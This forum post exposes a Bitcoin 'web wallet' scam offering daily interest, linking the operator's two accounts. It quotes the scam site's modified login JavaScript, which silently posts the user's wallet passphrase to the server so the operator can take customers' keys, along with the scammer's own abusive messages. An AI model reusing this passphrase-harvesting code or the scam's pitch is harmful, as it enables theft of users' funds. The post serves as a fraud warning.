The user "bitcoin-h" is an alt of "btc-banker" trying to scam depositors into sending Bitcoin into his scam web wallet, offering 3-10% interest daily.
Here are the threads if you want to do some reading up before checking out the evidence:
Newest bitcoin-h.com scamOlder btc-banker.com scamNow the fun part, below is evidence I've compiled about the scams.
please read my previous post - THIS IS A TIME LIMITED PROMO BONUS FROM OUR COMPANY FOR OUR MEMBERS
Hey btc-banker, how have you been?
Just so everyone knows, it's the same scammer as within this thread.
https://bitcointalk.org/index.php?topic=610197.0 If you look through the above thread you can see him scam other users. (Make sure you check out BurtW's technical breakdown)
The funny thing is he uses the same phrasing as well.
live statistic: 3340 members with over 1477.3487692308 bitcoins are trusting us!
5369 members
Is 5369 your favorite number?
Over 1448.0442307692 bitcoins.
Yeah, sure.
5369 members with over 1448.0442307692 bitcoins are trusting us!
New members and bitcoins deposited are counted instantly.
Thanks to all meber trust us!
You say trust a lot don't you?
no sense to continue this discution ... you talk big-big stupidity, probable because you are e idiot. (this will be my last reply to your "smart" comments- it's easy to talk shit without any evidence, better go and kill yourself)
Are you kidding me?
Posted from Bitcointa.lk - #xtmmNp5CUbnY4xb8 Let me know if you have any questions. And bitcoin-h, I'm looking forward to breaking down this scam of yours as well.Here he admits to being an alt of btc-banker,
come with evidence dont talk shit, show me a single user was scammed
Here's that requested evidence,
I have more than 50 btc here and get interest every day without issue!
And still, no trusted member comes forth on btc-bankers behalf.
btc-banker has the private keys of every customer victim./thread
Below shows that he doesn't selectively scam, he scams everyone. In this case he scammed someone of about $0.20 in
BTC. Yes, 20 cents.
the free 38435 satoshi you put in my newly created wallet is already gone lol guess you have to scrape off every satoshis you could get just to pay off your 5000+ members 3% daily interest
If you read through the btc-banker
thread you can see he has direct access to the private keys.
Here's more evidence that he's the same person who ran the scam site btc-banker.com.
Here's the
cached version of
btc-banker.com (The original was taken down)
Here's the current
bitcoin-h.com website.
Notice any similarities?
bitcoin-h then asks me this,
this is your opinion ..who care about? i expect other members opinion too ...
With his btc-banker scam no other member spoke up about a positive experience with the site even though at the time he claimed to have over 5000 members who have deposited into their wallet.
After he was asked what script was being used this was his response,
The issue is, the critical section of code, the one that creates the key pair sequence from the password or pass phrase looks like this on the original web site:
$('#open-sesame').click(function(){
var seed = $('#password').val();
seed = mn_decode(seed);
Electrum.init(seed, function(r) {
if(r % 20 == 0)
$('#seed-progress').css('width', (r + 19) + '%');
},
function(privKey) {
Electrum.gen(10, function(r) {
WALLET.getKeys().push(new Bitcoin.ECKey(r[1]));
if(WALLET.getKeys().length == 10)
login_success();
});
}
);
return true;
})
Notice how it simply creates 10 key pairs. However, on the btc-banker and bitcoin-h website this function is highly modified:
$('#open-sesame').click(function(){
$.ajax({
url: 'api/login.php',
type: 'POST',
dataType: 'json',
data: 'passphrase='+$('#password').val(),
success: function(e)
{
w_id = e.id;
can_go = true;
if (e.unread > 0) {
$('#unread_count').html('('+e.unread+')')
}
if (e.mp == 1) {
$('[name=old_pass]').removeClass('hidden');
} else {
$('[name=old_pass]').addClass('hidden');
}
$.ajax({
url: 'api/commission.php',
type: 'POST',
dataType: 'json',
data: 'w='+w_id,
success: function(e)
{
$('#comm').html(e.comm);
withdraw_max = e.comm.replace(/0+$/,'');
withdraw_max = e.comm.replace(/\.+$/,'');
}
});
$.ajax({
url: 'api/withdraw.php',
type: 'POST',
data: 'w='+w_id,
success: function(e)
{
$('#withdraw').html(e);
$(document).on('click', '#withdraw_btn', function()
{
$('#withdrawModal').modal();
$('#withdrawAmmount').html(withdraw_max);
$('input[name=withdraw_amount]').val(withdraw_max);
})
}
});
$(document).on('click', '#withdrawBTC', function()
{
var wform = $(this).closest('form').serialize();
$.ajax({
url: 'api/withdraw.php',
type: 'POST',
data: wform,
success: function(e)
{
$('#withdraw').html(e);
}
});
})
$.ajax({
url: 'api/messages.php',
type: 'POST',
data: 'w='+w_id,
success: function(e)
{
$('#messages').html(e);
$(document).on('click', '.send_msg form button.submit', function()
{
var wform = $(this).closest('form').serialize();
$.ajax({
url: 'api/messages.php',
type: 'POST',
data: wform,
success: function(e)
{
$('#messages').html(e);
}
});
});
}
});
mn_words = e.seed;
var seed = $('#password').val();
seed = mn_decode(seed);
Electrum.init(seed, function(r) {
if(r % 20 == 0)
$('#seed-progress').css('width', (r + 19) + '%');
},
function(privKey) {
Electrum.gen(10, function(r) {
WALLET.getKeys().push(new Bitcoin.ECKey(r[1]));
if(WALLET.getKeys().length == 10)
login_success();
});
}
);
}
});
return true;
})
bitcoin-h, you collect the private keys of every one of your customers. Here is the proof, directly from your code:
$('#open-sesame').click(function(){
$.ajax({
url: 'api/login.php',
type: 'POST',
dataType: 'json',
data: 'passphrase='+$('#password').val(),
success: function(e)
{
Specifically this line:
data: 'passphrase='+$('#password').val(),
Thanks
BurtW for
digging into the code on this one.
If you're inclined, feel free to give
bitcoin-h negative trust feedback.